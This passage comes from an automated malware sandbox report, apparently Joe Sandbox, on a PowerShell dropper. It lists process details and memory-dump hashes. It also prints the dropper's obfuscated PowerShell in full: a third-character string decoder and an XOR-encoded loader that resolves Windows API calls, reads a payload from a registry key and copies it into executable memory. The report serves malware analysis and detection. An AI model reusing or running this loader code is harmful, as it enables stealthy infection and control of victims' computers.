CakngRes Rplio Br LtDio Ce VnPrsUn3Im F=Al HyHUdTAlB C Ch'trBAnDMiCNaB LE I0upF P7PaFCoA AFRa1 BFKo6CyEMyA OELu9PeF B6 AE uBSkFch8 OBEk7 IDVo0 PF P7 TE PFPiFAf6AmFSp2 TFAmCStB F1 rBphDTrCKoA RE C9 AFAu1BaFUnCGoFTeAFeFCa0TrE TCFaEPoAStAAcA UBSk5DrB SDBiD O8PrFHo5 NE KANoF g0 CF LD HF B0 TFRuEslF O1ChFAnC SFReDReEEnASwFRe2 PE NB OF B8 CELaFChF FCKiEReD PEPoAPaB N5MuB FD fCBeB AF KC KFKoA EF P8EvF m7gtESpD TFCh8 VEDuD SFMi0 CF U6 FFHe7DuEInASpBOp5 CATu9PiBPe5SpACe9 IBOp0 K'in;Re& N( U`$FrD GeFumOvyAft ThSao Ul BoSag Si TzEniUnnElg K7 Q) D Ra`$unTBar KyKak ss ta IgLas CpFooUnr UtReoRee Sn ks I3Ma# R;""";Function Tryksagsportoens9 { param([String]$Potomato7); For($Anamnesis=2; $Anamnesis -lt $Potomato7.Length-1; $Anamnesis+=(2+1)){ $Topbetjentene = 'sub'+'string'; $Democrat = $Democrat + $photogalvanography + $Potomato7.$Topbetjentene.Invoke($Anamnesis, 1); } $Democrat;}$Lask0 = Tryksagsportoens9 ' VI uE DX M ';$Lask1= Tryksagsportoens9 $Uncolonizing;if([IntPtr]::size -eq 8){.$env:systemroot\S*64\W*Po*er*\*1.0\*ll.*xe $Lask1 ;}else{&$Lask0 $Lask1;};;;
    Imagebase:0x7ff7fbaf0000
    File size:447488 bytes
    MD5 hash:95000560239032BC68B4C2FDFCDEF913
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:.Net C# or VB.NET
    Reputation:high
    Show Windows behavior

    File Activities

    Show Windows behavior

    Section Activities

    Show Windows behavior

    Registry Activities

    Powershell Activities

    Show Windows behavior

    Mutex Activities

    Show Windows behavior

    Process Activities

    Show Windows behavior

    Thread Activities

    Show Windows behavior

    Memory Activities

    Show Windows behavior

    System Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Windows UI Activities

    Process Token Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    General

    Target ID:2
    Start time:21:52:38
    Start date:07/03/2023
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7fcd70000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Show Windows behavior

    File Activities

    Show Windows behavior

    Section Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Mutex Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Thread Activities

    Show Windows behavior

    Memory Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Windows UI Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    General

    Target ID:3
    Start time:21:52:43
    Start date:07/03/2023
    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):
    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Potomato7); $Anamnesisnch = New-Object byte[] ($Potomato7.Length / 2); For($Anamnesis=0; $Anamnesis -lt $Potomato7.Length; $Anamnesis+=2){ $Dogberries = $Potomato7.Substring($Anamnesis, 2); $Anamnesisnch[$Anamnesis/2] = [convert]::ToByte($Dogberries, 16); $Anamnesisnch[$Anamnesis/2] = ($Anamnesisnch[$Anamnesis/2] -bxor 153); } [String][System.Text.Encoding]::ASCII.GetString($Anamnesisnch);}$Unaware0=HTB 'CAE0EAEDFCF4B7FDF5F5';$Unaware1=HTB 'D4F0FAEBF6EAF6FFEDB7CEF0F7AAABB7CCF7EAF8FFFCD7F8EDF0EFFCD4FCEDF1F6FDEA';$Unaware2=HTB 'DEFCEDC9EBF6FAD8FDFDEBFCEAEA';$Unaware3=HTB 'CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFF';$Unaware4=HTB 'EAEDEBF0F7FE';$Unaware5=HTB 'DEFCEDD4F6FDECF5FCD1F8F7FDF5FC';$Unaware6=HTB 'CBCDCAE9FCFAF0F8F5D7F8F4FCB5B9D1F0FDFCDBE0CAF0FEB5B9C9ECFBF5F0FA';$Unaware7=HTB 'CBECF7EDF0F4FCB5B9D4F8F7F8FEFCFD';$Unaware8=HTB 'CBFCFFF5FCFAEDFCFDDDFCF5FCFEF8EDFC';$Unaware9=HTB 'D0F7D4FCF4F6EBE0D4F6FDECF5FC';$Demythologizing0=HTB 'D4E0DDFCF5FCFEF8EDFCCDE0E9FC';$Demythologizing1=HTB 'DAF5F8EAEAB5B9C9ECFBF5F0FAB5B9CAFCF8F5FCFDB5B9D8F7EAF0DAF5F8EAEAB5B9D8ECEDF6DAF5F8EAEA';$Demythologizing2=HTB 'D0F7EFF6F2FC';$Demythologizing3=HTB 'C9ECFBF5F0FAB5B9D1F0FDFCDBE0CAF0FEB5B9D7FCEECAF5F6EDB5B9CFF0EBEDECF8F5';$Demythologizing4=HTB 'CFF0EBEDECF8F5D8F5F5F6FA';$Demythologizing5=HTB 'F7EDFDF5F5';$Demythologizing6=HTB 'D7EDC9EBF6EDFCFAEDCFF0EBEDECF8F5D4FCF4F6EBE0';$Demythologizing7=HTB 'D0DCC1';$Demythologizing8=HTB 'C5';$Dissonere=HTB 'CCCADCCBAAAB';$Sanctology=HTB 'DAF8F5F5CEF0F7FDF6EEC9EBF6FAD8';function fkp {Param ($Allocyanine, $unsensualized) ;$Karskade0 =HTB 'BDCCF7EBFCE9EBF6EFFCFDB9A4B9B1C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DEFCEDD8EAEAFCF4FBF5F0FCEAB1B0B9E5B9CEF1FCEBFCB4D6FBF3FCFAEDB9E2B9BDC6B7DEF5F6FBF8F5D8EAEAFCF4FBF5E0DAF8FAF1FCB9B4D8F7FDB9BDC6B7D5F6FAF8EDF0F6F7B7CAE9F5F0EDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA1B0C2B4A8C4B7DCE8ECF8F5EAB1BDCCF7F8EEF8EBFCA9B0B9E4B0B7DEFCEDCDE0E9FCB1BDCCF7F8EEF8EBFCA8B0';&($Demythologizing7) $Karskade0;$Karskade5 = HTB 'BDD2ECEBEFFCF5F8FCF7FEFDFCB9A4B9BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCABB5B9C2CDE0E9FCC2C4C4B9D9B1BDCCF7F8EEF8EBFCAAB5B9BDCCF7F8EEF8EBFCADB0B0';&($Demythologizing7) $Karskade5;$Karskade1 = HTB 'EBFCEDECEBF7B9BDD2ECEBEFFCF5F8FCF7FEFDFCB7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFC4B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFB1B1D7FCEEB4D6FBF3FCFAEDB9D0F7EDC9EDEBB0B5B9B1BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCACB0B0B7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1BDD8F5F5F6FAE0F8F7F0F7FCB0B0B0B0B5B9BDECF7EAFCF7EAECF8F5F0E3FCFDB0B0';&($Demythologizing7) $Karskade1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Twentythree,[Parameter(Position = 1)] [Type] $Professionalisation = [Void]);$Karskade2 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB9A4B9C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DDFCFFF0F7FCDDE0F7F8F4F0FAD8EAEAFCF4FBF5E0B1B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7D8EAEAFCF4FBF5E0D7F8F4FCB1BDCCF7F8EEF8EBFCA1B0B0B5B9C2CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7DCF4F0EDB7D8EAEAFCF4FBF5E0DBECF0F5FDFCEBD8FAFAFCEAEAC4A3A3CBECF7B0B7DDFCFFF0F7FCDDE0F7F8F4F0FAD4F6FDECF5FCB1BDCCF7F8EEF8EBFCA0B5B9BDFFF8F5EAFCB0B7DDFCFFF0F7FCCDE0E9FCB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA9B5B9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA8B5B9C2CAE0EAEDFCF4B7D4ECF5EDF0FAF8EAEDDDFCF5FCFEF8EDFCC4B0';&($Demythologizing7) $Karskade2;$Karskade3 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DDFCFFF0F7FCDAF6F7EAEDEBECFAEDF6EBB1BDCCF7F8EEF8EBFCAFB5B9C2CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7DAF8F5F5F0F7FEDAF6F7EFFCF7EDF0F6F7EAC4A3A3CAEDF8F7FDF8EBFDB5B9BDCDEEFCF7EDE0EDF1EBFCFCB0B7CAFCEDD0F4E9F5FCF4FCF7EDF8EDF0F6F7DFF5F8FEEAB1BDCCF7F8EEF8EBFCAEB0';&($Demythologizing7) $Karskade3;$Karskade4 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DDFCFFF0F7FCD4FCEDF1F6FDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEABB5B9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEAAB5B9BDC9EBF6FFFCEAEAF0F6F7F8F5F0EAF8EDF0F6F7B5B9BDCDEEFCF7EDE0EDF1EBFCFCB0B7CAFCEDD0F4E9F5FCF4FCF7EDF8EDF0F6F7DFF5F8FEEAB1BDCCF7F8EEF8EBFCAEB0';&($Demythologizing7) $Karskade4;$Karskade5 = HTB 'EBFCEDECEBF7B9BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DAEBFCF8EDFCCDE0E9FCB1B0';&($Demythologizing7) $Karskade5 ;}$Wendys = HTB 'F2FCEBF7FCF5AAAB';$Karskade6 = HTB 'BDCCFDF4F8F7EFEBFCEBFCEAB9A4B9C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DEFCEDDDFCF5FCFEF8EDFCDFF6EBDFECF7FAEDF0F6F7C9F6F0F7EDFCEBB1B1FFF2E9B9BDCEFCF7FDE0EAB9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEADB0B5B9B1DEDDCDB9D9B1C2D0F7EDC9EDEBC4B5B9C2CCD0F7EDAAABC4B5B9C2CCD0F7EDAAABC4B5B9C2CCD0F7EDAAABC4B0B9B1C2D0F7EDC9EDEBC4B0B0B0';&($Demythologizing7) $Karskade6;$Recantations = fkp $Demythologizing5 $Demythologizing6;$Karskade7 = HTB 'BDCAE9F1FCFAF0ECEAAAB9A4B9BDCCFDF4F8F7EFEBFCEBFCEAB7D0F7EFF6F2FCB1C2D0F7EDC9EDEBC4A3A3C3FCEBF6B5B9AFADA9B5B9A9E1AAA9A9A9B5B9A9E1ADA9B0';&($Demythologizing7) $Karskade7;$Karskade8 = HTB 'BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB9A4B9BDCCFDF4F8F7EFEBFCEBFCEAB7D0F7EFF6F2FCB1C2D0F7EDC9EDEBC4A3A3C3FCEBF6B5B9ABAAACADAAA1A9A1B5B9A9E1AAA9A9A9B5B9A9E1ADB0';&($Demythologizing7) $Karskade8;$Tryksagsportoens=(Get-ItemProperty -Path 'HKCU:\luftkastellernes\Isobutyric54').Meaningfully;$Karskade9 = HTB 'BDD2F8EBEAF2F8FDFCB9A4B9C2CAE0EAEDFCF4B7DAF6F7EFFCEBEDC4A3A3DFEBF6F4DBF8EAFCAFADCAEDEBF0F7FEB1BDCDEBE0F2EAF8FEEAE9F6EBEDF6FCF7EAB0';&($Demythologizing7) $Karskade9;$Tryksagsportoens0 = HTB 'C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DAF6E9E0B1BDD2F8EBEAF2F8FDFCB5B9A9B5B9B9BDCAE9F1FCFAF0ECEAAAB5B9AFADA9B0';&($Demythologizing7) $Tryksagsportoens0;$Sphingidae62=$Karskade.count-640;$Tryksagsportoens1 = HTB 'C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DAF6E9E0B1BDD2F8EBEAF2F8FDFCB5B9AFADA9B5B9BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB5B9BDCAE9F1F0F7FEF0FDF8FCAFABB0';&($Demythologizing7) $Tryksagsportoens1;$Tryksagsportoens2 = HTB 'BDCBE0F7FAF1F6EAE9F6EBF8B9A4B9C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DEFCEDDDFCF5FCFEF8EDFCDFF6EBDFECF7FAEDF0F6F7C9F6F0F7EDFCEBB1B1FFF2E9B9BDDDF0EAEAF6F7FCEBFCB9BDCAF8F7FAEDF6F5F6FEE0B0B5B9B1DEDDCDB9D9B1C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B0B9B1C2D0F7EDC9EDEBC4B0B0B0';&($Demythologizing7) $Tryksagsportoens2;$Tryksagsportoens3 = HTB 'BDCBE0F7FAF1F6EAE9F6EBF8B7D0F7EFF6F2FCB1BDCAE9F1FCFAF0ECEAAAB5BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB5BDCBFCFAF8F7EDF8EDF0F6F7EAB5A9B5A9B0';&($Demythologizing7) $Tryksagsportoens3#
    Imagebase:
    File size:430592 bytes
    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:high

    Powershell Activities


    Disassembly

    Executed Functions

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5ad69c136e8bcd9d1acfda140125f48469f60ed4149cf2b7d5346723edad64b8
    • Instruction ID: 6e9768cdde779f08829c6241bfbcc76908f35b3b2ad0a57c6c6a597be3e6a5f0
    • Opcode Fuzzy Hash: 5ad69c136e8bcd9d1acfda140125f48469f60ed4149cf2b7d5346723edad64b8
    • Instruction Fuzzy Hash: 9F12E33190DA894FEB45DF2CC496AA97BF1FF59310F1401AAD09DC7193CA64BC8AC782
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 095b65e49dd0489671db9452d76d7bee88c19aa65bb5db4046359cb2a60ed234
    • Instruction ID: 71223c752dd93fbedd37196495746828e11b054201c0875f97407b7390976af9
    • Opcode Fuzzy Hash: 095b65e49dd0489671db9452d76d7bee88c19aa65bb5db4046359cb2a60ed234
    • Instruction Fuzzy Hash: A8D16D31A08A498FEF84DF58C495AE97BE1FFA8300F14426AD45DD7296CA74FC85CB81
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a0a8800c3df33b619e801e3a98cab3b535e59d092ea6aae968a12f5d1425dd0b
    • Instruction ID: 3d2e0e1ebd088c6fc3f0bbaa4ca124cb26381c67d6d6b88d5b3336f95c2d9c51
    • Opcode Fuzzy Hash: a0a8800c3df33b619e801e3a98cab3b535e59d092ea6aae968a12f5d1425dd0b
    • Instruction Fuzzy Hash: ABE1C031A08A498FEF84DF5CC496AE97BF1FF58310F14426AD44DD7286CA74F8868B81
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 56d8ad63406c9c86ec00f063c57892b326090568f3944e77befcbe84ce5041a8
    • Instruction ID: 00e31ffe9db6eafe8e65199e526b4916f973690fd1366e66cd7227b1379918bb
    • Opcode Fuzzy Hash: 56d8ad63406c9c86ec00f063c57892b326090568f3944e77befcbe84ce5041a8
    • Instruction Fuzzy Hash: AAB1113190D7C64FE746DB2884A2AA17FF4EF57320B1801BED0D9CB193DA65B84AC752
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2704fa38cdbead402eec282ad2b0adc788706e96254bffa4f4b9703ebbbbb15d
    • Instruction ID: 46bde33f071c8886481afade4814076a42cc5d1878204bea5b8a136979a8b0a3
    • Opcode Fuzzy Hash: 2704fa38cdbead402eec282ad2b0adc788706e96254bffa4f4b9703ebbbbb15d
    • Instruction Fuzzy Hash: 2951393190CA894FD344DB28D451BA6B7E1FF85310F5487BEE09CC7192CE79A949C782
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 078f402413b1f7c3d3e6e5fa9d6657ec25dcd12c8d00b54b638b3d7d41786cc3
    • Instruction ID: 3b949bcc3e6413b6cc767b1ff98a6413aaa5af30aa267f114787701ffdcf4894
    • Opcode Fuzzy Hash: 078f402413b1f7c3d3e6e5fa9d6657ec25dcd12c8d00b54b638b3d7d41786cc3
    • Instruction Fuzzy Hash: 5121B23021CA494FD749DF18D0916B9B7E0FF95310F20056DE0DEC71A6DA36B846C706
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ae071eaeab13546d19a9dce9f247eddc9ee4ec17944736d9f55863a9bfb451fd
    • Instruction ID: fa73f3a388f20fcdf33bb2592432cd54a6706072ff50bcfe235837213c685601
    • Opcode Fuzzy Hash: ae071eaeab13546d19a9dce9f247eddc9ee4ec17944736d9f55863a9bfb451fd
    • Instruction Fuzzy Hash: 4CF05E7271CB445FEB5CDA0CF8429B573D1E789330B50022EF0CBC26D6EA26B8428686
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 045dfeb4a67997d3c3400bd5a8e5ddf8ec2557b7edc270a255cc28922e14c32e
    • Instruction ID: 28e6d19f66d48a8b4bb9ebdcfa70d0283fd42f716137582e625eb7313e23a348
    • Opcode Fuzzy Hash: 045dfeb4a67997d3c3400bd5a8e5ddf8ec2557b7edc270a255cc28922e14c32e
    • Instruction Fuzzy Hash: 9BF0303276C6044FE74C9A0CF8439B573D1E789220B40016EE48EC2696E916B8478686
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ee098e803f81901cf1013a77d0d09b3ab5208553034d842daf7031f41340d9c8
    • Instruction ID: 62f44ee10dfdc39c1c120e8917ed3e711a9607a7fcf9039664cdca441bb4be71
    • Opcode Fuzzy Hash: ee098e803f81901cf1013a77d0d09b3ab5208553034d842daf7031f41340d9c8
    • Instruction Fuzzy Hash: BEE0E53276C6044F975CDA1CF8539F573D1E789334B40416FE48BC2657E916F8478686
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000001.00000002.837205650.00007FF9A7D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7D10000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7ff9a7d10000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2b021b82e4817b878d0ddfc9fa7eb74e66070b3a9546bfb542e138f5e7803d54
    • Instruction ID: 8fc5c98e111d76b5adbceeb8248008a1b32bd4f9501f9b97543a42fdc685023b
    • Opcode Fuzzy Hash: 2b021b82e4817b878d0ddfc9fa7eb74e66070b3a9546bfb542e138f5e7803d54
    • Instruction Fuzzy Hash: A2F14A31A0DA4A4FE328DF5CE4826B1B7D1FF45310B1486BEC4DEC7596DA66B8468382
    Uniqueness

    Uniqueness Score: -1.00%